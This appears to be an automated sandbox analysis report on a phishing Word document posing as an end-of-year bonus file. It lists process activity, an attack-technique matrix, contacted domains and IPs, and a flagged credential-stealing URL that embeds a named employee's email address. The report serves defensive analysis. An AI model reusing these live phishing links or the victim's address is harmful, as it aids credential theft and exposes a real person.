Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1928,i,6146988213687095418,5572660784010154810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Gioia Faggioli-End Of Year-Bonus.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Gioia Faggioli-End Of Year-Bonus.docx
Source: Google Drive.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/#Xgioia.faggioli@modula.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.2.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.18.94.41
          truefalse
            high
            www.google.com
            172.217.19.164
            truefalse
              high
              vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru
              172.67.134.110
              truefalse
                high
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  gs.quantumdhub.ru
                  104.21.112.1
                  truetrue
                    unknown
                    word.office.com
                    unknown
                    unknownfalse
                      high
                      www.microsoft365.com
                      unknown
                      unknownfalse
                        high
                        identity.nel.measure.office.net
                        unknown
                        unknownfalse
                          high
                          login.microsoftonline.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                              high
                              https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                high
                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f481fd4183442af/1734618984617/Jf0Unnedg83rw87false
                                    high
                                    https://vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru/310464925672995352ugqKwpWJAGDHWYJSQVQXHKATTCSIZYDMVIKIRNfalse
                                      unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f481fd4183442af&lang=autofalse
                                          high
                                          https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/#Xgioia.faggioli@modula.comtrue
                                          • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/false
                                            high
                                            https://gs.quantumdhub.ru/favicon.icofalse
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f481fd4183442af/1734618984616/648a1742b74a790355ded4efe2ab085daee43b16d2974c62784ee075a5e327a9/asbbOwmG_QR4EhLfalse
                                                high
                                                https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/false
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3false
                                                    high
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://login.microsoftonline.comchromecache_125.7.dr, chromecache_116.7.drfalse
                                                      high
                                                      https://login.windows-ppe.netchromecache_125.7.dr, chromecache_116.7.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.18.94.41
                                                        challenges.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        172.217.19.164
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        104.21.112.1
                                                        gs.quantumdhub.ruUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        35.190.80.1
                                                        a.nel.cloudflare.comUnited States
                                                        15169GOOGLEUSfalse
                                                        104.17.24.14
                                                        cdnjs.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.18.95.41
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        151.101.2.137
                                                        code.jquery.comUnited States
                                                        54113FASTLYUSfalse
                                                        239.255.255.250
                                                        unknownReserved
                                                        unknownunknownfalse
                                                        104.17.25.14
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        172.67.134.110
                                                        vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ruUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        IP
                                                        192.168.2.17
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1578343
                                                        Start date and time:2024-12-19 15:35:30 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 12s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:23
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Gioia Faggioli-End Of Year-Bonus.docx
                                                        Detection:MAL
                                                        Classification:mal56.winDOCX@21/93@38/11
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .docx
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, TextInputHost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.28.47, 52.113.194.132, 23.218.208.109, 52.111.252.18, 52.111.252.17, 52.111.252.15, 52.111.252.16, 199.232.214.172, 142.250.181.99, 172.217.19.206, 64.233.162.84, 142.250.181.142, 20.50.73.9, 192.229.221.95, 2.16.1.146, 2.16.1.200, 172.217.17.35, 199.232.210.172, 13.107.6.156, 20.190.147.9, 20.190.177.148, 20.190.147.11, 20.190.147.1, 20.190.147.5, 20.190.177.147, 20.190.147.10, 20.190.147.6, 23.32.238.209, 23.32.238.168, 23.50.131.200, 23.50.131.216, 142.250.181.138, 172.217.17.42, 172.217.19.10, 172.217.17.74, 142.250.181.74, 172.217.19.234, 172.217.19.202, 142.250.181.106, 40.79.141.154, 20.231.128.67, 4.245.163.56, 13.107.5.88, 2.16.158.186, 13.107.246.63, 20.190.177.84, 20.190.177.21
                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, ak.privatelink.msidentity.com, onedscolprdfrc06.francecentral.cloudapp.azure.com, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, officeclient.microsoft.com, wu-b-net.trafficmanager.net, www.bing.com, ecs.office.com, fs.microsoft.com, content-autofill.googleapis.com, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, aadcdnoriginwus2.azureedge.net, aadcdn.msauth.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, eu.events.data.trafficmanager.net, onedscolprdneu01.northeurope.cloudapp.azure.com, uks-azsc-000.roaming.officeapps.live.com, nleditor.osi.office.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, s-0005.s-msedge.net, aadcdnoriginwus2.afd.azureedge.net, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, clients.
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: Gioia Faggioli-End Of Year-Bonus.docx
                                                        No simulations
                                                        SourceURL
                                                        Screenshothttps://GS.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/#Xgioia.faggioli@modula.com
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                                        • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                                        http://vtaurl.comGet hashmaliciousUnknownBrowse
                                                        • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                                        http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                                        • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                                        104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                        • beammp.com/phpmyadmin/
                                                        104.18.94.41Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                          https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                            NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
